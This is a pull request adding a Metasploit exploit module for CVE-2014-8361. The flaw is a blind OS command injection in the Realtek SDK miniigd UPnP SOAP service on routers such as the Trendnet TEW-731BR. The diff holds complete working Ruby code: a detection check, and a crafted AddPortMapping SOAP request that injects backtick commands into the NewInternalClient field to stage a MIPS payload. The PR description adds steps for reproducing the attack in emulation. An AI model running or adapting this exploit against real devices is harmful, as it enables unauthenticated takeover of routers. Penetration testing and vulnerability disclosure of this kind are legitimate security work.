### PR TITLE
Miniigd command injection

### DIFF
--- a/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb
+++ b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb
@@ -15,9 +15,9 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'        => 'Realtek SDK Miniigd UPnP SOAP Command Execution',
       'Description' => %q{
-        Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command 
-        injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability, 
-        there is no output for the executed command. 
+        Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command
+        injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability,
+        there is no output for the executed command.
         This module has been tested in emulation on a Trendnet TEW-731BR router.
       },
       'Author'      =>

--- a/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb
+++ b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb
@@ -1,0 +1,144 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Realtek SDK Miniigd UPnP SOAP Command Execution',
+      'Description' => %q{
+        Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command 
+        injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability, 
+        there is no output for the executed command. 
+        This module has been tested in emulation on a Trendnet TEW-731BR router.
+      },
+      'Author'      =>
+        [
+          'Ricky "HeadlessZeke" Lawshae', # Vulnerability discovery
+          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['CVE', '2014-8361'],
+          ['ZDI', '15-155'],
+          ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Software-Development-KITchen-sink/ba-p/6745115#.VWVfsM_tmko'],
+          ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10055']
+        ],
+      'DisclosureDate' => 'Apr 24 2015',
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'DisableNops' => true
+        },
+      'Targets' =>
+        [
+          [ 'MIPS Little Endian',
+            {
+              'Platform' => 'linux',
+              'Arch'     => ARCH_MIPSLE
+            }
+          ],
+          [ 'MIPS Big Endian',
+            {
+              'Platform' => 'linux',
+              'Arch'     => ARCH_MIPSBE
+            }
+          ],
+        ],
+      'DefaultTarget'    => 0
+      ))
+
+      deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
+
+    register_options(
+      [
+        Opt::RPORT(52869) # port of UPnP SOAP webinterface
+      ], self.class)
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'uri' => '/picsdesc.xml'
+      })
+      if res && [200, 301, 302].include?(res.code) && res.headers['Server'] =~ /miniupnpd\/1.0 UPnP\/1.0/
+        return Exploit::CheckCode::Detected
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to access the device ...")
+
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
+    end
+
+    print_status("#{peer} - Exploiting...")
+
+    execute_cmdstager(
+      :flavor  => :echo,
+      :linemax => 50
+    )
+  end
+
+  def execute_command(cmd, opts)
+    uri = '/wanipcn.xml'
+
+    new_portmapping_descr = rand_text_alpha(8)
+    new_external_port = rand(32767) + 32768
+    new_internal_port = rand(32767) + 32768
+
+    # We need something like this:
+    #cmd = "echo -en \\\x7f\\\x45\\\x4c\\\x46\\\x01  > /var/tmp/pwdn"
+    cmd = cmd.gsub("\\\\", "\\\\\\\\\\")
+
+    soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
+
+    data_cmd = "<?xml version=\"1.0\"?>"
+    data_cmd << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
+    data_cmd << "<SOAP-ENV:Body>"
+    data_cmd << "<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
+    data_cmd << "<NewLeaseDuration></NewLeaseDuration>"
+    data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>"
+    data_cmd << "<NewEnabled>1</NewEnabled>"
+    data_cmd << "<NewExternalPort>#{new_external_port}</NewExternalPort>"
+    data_cmd << "<NewRemoteHost></NewRemoteHost>"
+    data_cmd << "<NewProtocol>TCP</NewProtocol>"
+    data_cmd << "<NewInternalPort>#{new_internal_port}</NewInternalPort>"
+    data_cmd << "</m:AddPortMapping>"
+    data_cmd << "</SOAP-ENV:Body>"
+    data_cmd << "</SOAP-ENV:Envelope>"
+
+    begin
+      res = send_request_cgi({
+        'uri'    => uri,
+        'vars_get' => {
+          'service' => 'WANIPConn1'
+        },
+        'ctype' => "text/xml",
+        'method' => 'POST',
+        'headers' => {
+          'SOAPAction' => soapaction,
+          },
+        'data' => data_cmd
+      })
+      return res
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+end


### PR DESCRIPTION
This module exploits the vulnerability discovered by Ricky "HeadlessZeke" Lawshae and documented in ZDI-15-155: http://www.zerodayinitiative.com/advisories/ZDI-15-155/
More details: http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Software-Development-KITchen-sink/ba-p/6745115#.VWVfsM_tmko

Screenshot:
![realtek_command_injection](https://cloud.githubusercontent.com/assets/497520/7835243/7f4fab6e-0477-11e5-8559-dbdd1ee794a4.png)

You can verify this exploit in emulation:
- Firmware Image: http://www.trendnet.com/support/supportdetail.asp?prod=230_TEW-731BR
- binwalk it
- copy to a debian aurel MIPS-BE machine
- fix it:

```
mkdir -p var/linuxigd
cp etc/tmp/pics* var/linuxigd

echo "" > etc/miniigd.conf
```
- start miniigd:
  `chroot . ./bin/miniigd -i eth0 -s 0 -e 1.1.1.1`
- wait a few seconds and check it  with netstat
- exploit it
